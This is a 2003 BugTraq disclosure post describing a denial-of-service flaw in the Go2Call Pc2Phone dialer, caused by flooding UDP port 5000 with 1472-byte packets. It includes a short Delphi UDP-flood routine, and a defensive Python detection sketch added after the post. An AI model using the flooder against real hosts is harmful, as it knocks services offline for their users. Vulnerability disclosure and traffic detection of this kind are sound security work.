BugTraq
Go2Call Cash Calling vulnerable Sep 01 2003 05:34PM
Dima (megapolus hotbox ru)


Hi, sorry for my English.

I found a bug in the program Go2Call Cash Calling.

It's a dialer for talking from the Internet, Pc2Phone.

If you send a few UDP packets with a size of 1500 bytes, for example 1472 chars 'A', to port 5000, then this program will not work.

The exploit is very easy.

A part of the code in Delphi:

procedure TForm1.Button1Click(Sender: TObject);
var
  C: string;
  N: integer;
  MyStream: TMemoryStream;
begin
  Memo1.Lines.Add('start');
  C := Edit3.Text; // for example 'AAAA...' 1472 char 'A' for certain
  N := strtoint(Edit4.Text);
  NMUDP1.RemoteHost := Edit1.Text;
  NMUDP1.RemotePort := strtoint(Edit2.Text);
  MyStream := TMemoryStream.Create;
  try
    MyStream.Write(C[1], Length(C));
    for n := 1 to N do
    begin
      NMUDP1.SendStream(MyStream);
    end;
  finally
    MyStream.Free;
  end;
  Memo1.Lines.Add('finish');
end;

Yahoo Messenger, for example, lost connection after such attacks, and on UDP port 5000 too.

Net2Phone dialer pc2phone (likely Go2Call dialer) will have sound noise in your headphones, UDP port 6801.

[ reply ]
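
A detection sketch for the traffic pattern reported above, added here as an example and not part of the original post: it flags bursts of near full-size UDP datagrams (1472 bytes of payload is 1500 bytes on the wire once the 20-byte IP and 8-byte UDP headers are counted) sent to the ports the post names. The record layout, the size cutoff, the window and the threshold are assumptions, and the sample records are constructed.

```python
from collections import defaultdict, deque

WATCHED_PORTS = {5000, 6801}   # UDP ports named in the post
MIN_PAYLOAD = 1400             # assumption: near full-size cutoff (the post uses 1472)
WINDOW_SECONDS = 1.0           # assumption: sliding window length
THRESHOLD = 5                  # assumption: large datagrams per window before alerting


def detect_large_udp_bursts(records):
    """records: (timestamp, src_ip, dst_ip, dst_port, payload_len), sorted by time.
    Returns one alert per burst of large datagrams to a watched (dst, port)."""
    recent = defaultdict(deque)   # (dst, port) -> deque of (timestamp, src)
    alerting = set()              # keys currently inside an already-reported burst
    alerts = []
    for ts, src, dst, dport, length in records:
        if dport not in WATCHED_PORTS or length < MIN_PAYLOAD:
            continue
        key = (dst, dport)
        window = recent[key]
        window.append((ts, src))
        # Drop entries older than the window; the newest entry always remains.
        while ts - window[0][0] > WINDOW_SECONDS:
            window.popleft()
        if len(window) < THRESHOLD:
            alerting.discard(key)          # burst ended, allow a later re-alert
        elif key not in alerting:
            alerting.add(key)
            alerts.append({"dst": dst, "port": dport,
                           "first_seen": window[0][0],
                           "sources": sorted({s for _, s in window})})
    return alerts


# Constructed sample records using documentation address ranges.
SAMPLE = (
    # ordinary small datagrams to port 5000: ignored
    [(0.02 * i, "198.51.100.7", "192.0.2.10", 5000, 160) for i in range(20)]
    # burst of 1472-byte datagrams to port 5000: one alert
    + [(1.0 + 0.01 * i, "203.0.113.9", "192.0.2.10", 5000, 1472) for i in range(10)]
    # a single large datagram to port 6801: below threshold
    + [(2.0, "203.0.113.9", "192.0.2.11", 6801, 1472)]
)

if __name__ == "__main__":
    for alert in detect_large_udp_bursts(SAMPLE):
        print(alert)
```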


 
